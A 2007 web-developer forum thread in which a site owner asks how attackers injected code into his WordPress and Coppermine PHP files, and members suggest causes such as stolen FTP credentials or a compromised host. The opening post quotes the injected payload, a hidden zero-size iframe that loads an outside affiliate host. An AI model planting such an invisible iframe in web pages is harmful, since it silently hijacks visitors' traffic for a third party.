Page 1 of 2
How do you prevent this?
Posted: Fri Aug 31, 2007 4:10 pm
by Billy2007
feyd | Please use Code: Select all
and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read: [url=http://forums.devnetwork.net/viewtopic.php?t=21171]Posting Code in the Forums[/url] to learn how to do it too.[/color]
There's an exploit out there and if your site gets hacked chances are you won't even know it.
The hack inserts code into php and html files. In my case two apps were hacked on my site yesterday - one was the WordPress Blog, the other was a php image gallery, Coppermine.
What code was inserted?:
[syntax="html"]<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
The fix?
Very simple. Get yourself a nice search and replace utility that does batch replaces and replace the code leaving the replace field blank. Or write a script to do it on the server.
The problem? They'll be back.
So can any experts out there, I"m just a photographer, shed some light on a how client sider like me can secure his shared server (Apache) from these cybertrash kiddies and their sick bots?
Any suggestions would be greatly appreciated. I run many PhP applications including PixelPost and PhPbb but only coppermine and wordpress were infected. It seems that the CMS community is very hush hush on these exploits - bad publicity for them - and as I said before, most users (probably thousands of them) don't know the code is there unless it breaks an application by busting up the code.
Thanks in advance.
edit: I should have added that the code doesn't try to break the site, it just redirects traffic in the background to generate ad revenue i guess..if you watch the status bar you will see all kinds of transfers going on while the page loads. In some cases it does break it unwittingly, for example it caused IE to read my CSS wrong and send my WP Sidebar to the bottom..that was the tipoff for me.
feyd | Please use[/syntax]Code: Select all
and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read: [url=http://forums.devnetwork.net/viewtopic.php?t=21171]Posting Code in the Forums[/url] to learn how to do it too.[/color]
[quote="[url=http://forums.devnetwork.net/viewtopic.php?t=30037]Forum Rules[/url] Section 1.1"][b]2.[/b] Use descriptive subjects when you start a new thread. Vague titles such as "Help!", "Why?" are misleading and keep you from receiving an answer to your question.[/quote]
Posted: Sat Sep 01, 2007 4:54 am
by Kieran Huggins
There's no magic security bullet code out there. Each instance is an example of a different security hole being found and exploited in each package. The authors of those apps do release security and bug fixes regularly to fix these vulnerabilities.
Your best defense is to try and keep your app installs up-to-date at all times. Many "one click install" hosts have a "one click upgrade" button that makes it dead simple to stay up-to-date with the latest security releases. It's sometimes a bit of a pain to do manually, but it's a chore that needs to be done, none the less.
Re: How do you prevent this?
Posted: Sat Sep 01, 2007 6:41 am
by superdezign
Re: How do you prevent code insertion attack?
Posted: Sat Sep 01, 2007 10:42 am
by Billy2007
superdezign wrote:
Inserted where?
The code was inserted somewhere in the body of index.php in WordPress. In the case of Coppermine, the code was inserted (often multiple times) at the top of most (if not all) of the php files that are in the include folder.
Updating is part of the solution - I do that and and most importantly all my files and the MySQL tables are religiously backed-up weekly.
My question is how does this happen so I can customize my opensource php to minimize it happening again. Customized code is very unlikely to be hacked, mainstream code is very likely to be hacked.
If anyone has the expertise of a hacker, i.e. to understand how the attack happens - where is the point of entry, is it related to the server configuration (global settings), is it related to the login, etc....that's where it would be helpful and hopefully this prevention information could be spread to other CMS communities.
Fact: the average php based CMS user (forums, Mambo, Joomla, Wordpress, etc) is not a techie. These people create content not code. It's a shame to see a site defaced or trashed when it could have been stopped with some simple to implement measures.
I don't know how this attack works..and unless I can find an expert to explain it to me, I won't be in any position to stop one in the future, upgrades or not. btw, upgrades are a complex process because plugins and customizations rarely work afterwards.
So again, any help from the experts in this community would be greatly appreciated.
Thanks
P.S. sorry for the vague subject and not using the code tags...
Re: How do you prevent code insertion attack?
Posted: Sat Sep 01, 2007 11:22 am
by superdezign
Billy2007 wrote:My question is how does this happen so I can customize my opensource php to minimize it happening again.
It was actually IN the files? That doesn't sound like a client-side hack. Most likely, someone actually gained access to your server via FTP. Maybe you should consider a more secure password.
Billy2007 wrote:Customized code is very unlikely to be hacked, mainstream code is very likely to be hacked.
I don't agree with that statement
at all. Mainstream just means more people actually know what the code looks like. That doesn't make the code less secure.
Re: How do you prevent code insertion attack?
Posted: Sat Sep 01, 2007 1:27 pm
by Billy2007
It was actually IN the files? That doesn't sound like a client-side hack. Most likely, someone actually gained access to your server via FTP. Maybe you should consider a more secure password.
Client side? No, never came into question. This is server side - like sql injection. the fact that the same line of code was repeated several times, the fact that only certain apps were compromised, all point to a bot attack ( I also checked the access logs on the server....nobody hacked the passwords.
don't agree with that statement at all. Mainstream just means more people actually know what the code looks like. That doesn't make the code less secure.
Agreed - what I meant is that bots look for code they can recognize - this why captcha with questions works..bots are too stupid to answer simple questions unless they know what questions will be asked. simply removing a website url field on a comment form can end a spammer's attempt to spam your site...change the order or names of fields on a registration form will once more send a bot into fits...that's what I meant...
obviously if we are talking humans, well that's another story, but to think some hacker actually looked for me tiny little site out of the billions of sites out there, just to insert a few lines of code that would help him generate some ad revenue before being reported and shut down doesn't make sense.
so my initial question remains, by what mechanism was the hack perpetrated? knowing that will help prevent it.
edit: when i said i'm a client sider, I meant I photograph, I photoshop, I write flash actionscript, I write javascript, as well as CSS etc....in other words I can develop my own website. I also access my site through FTP and its Control Panel...the basics of Unix etc...but I'm not a security expert on php nor on servers...that's why I'm asking for help in this community. none of my html or flash components were touched, only the php ones.
Posted: Sat Sep 01, 2007 1:43 pm
by califdon
I'm certainly not a security expert either, but I totally agree with Superdezign that what you described sounds like it had to be done on the server side by someone who gained access to your hosting password. I know of no exploit from a client program that could change code in your scripts. That's what he meant by client-side.
Posted: Sat Sep 01, 2007 3:04 pm
by Billy2007
califdon wrote:I'm certainly not a security expert either, but I totally agree with Superdezign that what you described sounds like it had to be done on the server side by someone who gained access to your hosting password. I know of no exploit from a client program that could change code in your scripts. That's what he meant by client-side.
Then the person who hacked my account must have been severely mentally retarded. Why? Because aside from the fact that no real damage was done to my site, the same line of code was inserted repeatedly. A bot will do that but a human realizes when he has inserted it once versus a dozen times in the same file....other files infected aren't even used by my site....they just happened to be in the same folder.....files in image folders were infected although they aren't even executed...only a bot could make that "mistake".
Also, doing a google search on free20.com hack will reveal a handful of people who have reported this - there is no relationship between myself and these people...we all got hacked by bots...in fact these bots were likely unleashed in the past because the website of the hacker has been closed down....again he would have to be incredibly stupid to add code to generate ad revenue for his website when his site no longer is up.
surely a bot must have infected thousands of users, not just me, why so little reports on the web? because the hack doesn't do much damage if any...you will only notice you are infected if you look at the status bar on your browser...there you will see transfers from ad sites as the page loads - so people don't even know they are infected.
regarding your point about client or server, again yes it is server side...and yes these attacks happen all the time, spam bots, sql injection, etc....even Microsoft's site has been defaced by bots.
final point...i use strong passwords..my site is not even advertised, it is just for family and friends...this wasn't the work of Kevin Mitnick.

Posted: Sun Sep 02, 2007 1:55 am
by s.dot
Are your files writable by everyone? 0777?
Posted: Sun Sep 02, 2007 9:33 am
by Billy2007
Hey Scott
The index.php file from the WordPress blog had one line of code (the iframe) inserted - it is the only line of code that actually worked (i.e. that redirected to ad sites).
The properties are set to only allow the owner to write: 644
The compromised files in the Coppermine gallery include folder actually broke one of the files and did not allow the iframe hack to do its thing. Once more, these files are set to 644. These had the same line of code repeatedly inserted for some reason - as if the bot did not realize it had inserted the file and kept repeating.
None of the other components of the site - flash, html were compromised. Same for the other php components - Pixelpost (3 photo galleries in different folders) and PHPbb forum - all were clean.
Any insight into how this attack was carried out would be greatly appreciated - there is very little on the internet on this issue. People can only offer "someone must know your password" - which reminds me of the typical tech support response when your printer doesn't work - "must be a virus, reformat your hard drive and reinstall windows and all your applications".
Posted: Sun Sep 02, 2007 10:12 pm
by Z3RO21
Sounds to me like a bot exploiting poorly written code that is not properly validating data.
Posted: Mon Sep 03, 2007 5:14 am
by VladSun
Have you emailed your hosting support about this? Maybe it would come out that you are not the only one with this problem

Posted: Mon Sep 03, 2007 12:49 pm
by Billy2007
Z3RO21 wrote:Sounds to me like a bot exploiting poorly written code that is not properly validating data.
Agreed. I have updated both php apps - but I still want to understand where the door was, so I can shut it down.
Posted: Mon Sep 03, 2007 12:50 pm
by Billy2007
VladSun wrote:Have you emailed your hosting support about this? Maybe it would come out that you are not the only one with this problem

I spoke to them on the phone as well..they were totally useless...their attitude was it's not our problem..it's your problem.
Posted: Mon Sep 03, 2007 1:05 pm
by VladSun
Billy2007 wrote:Z3RO21 wrote:Sounds to me like a bot exploiting poorly written code that is not properly validating data.
Agreed. I have updated both php apps - but I still want to understand where the door was, so I can shut it down.
Most probably it is not the case. Usually, only your FTP user has write access to your files, unless they are chmoded to 0777 permissions. That's why a poor coding problem wouldn't result file modifications. You said that your modified files had 0644 permissions, so it should have been done by your FTP user or by other user with write access (e.g. root

).
So, there are two ways it could be done:
1) somebody has access by your FTP user/password (e.g. by using a trojan on you PC);
2) your hosting server has been totally hacked;
I would vote for the second one
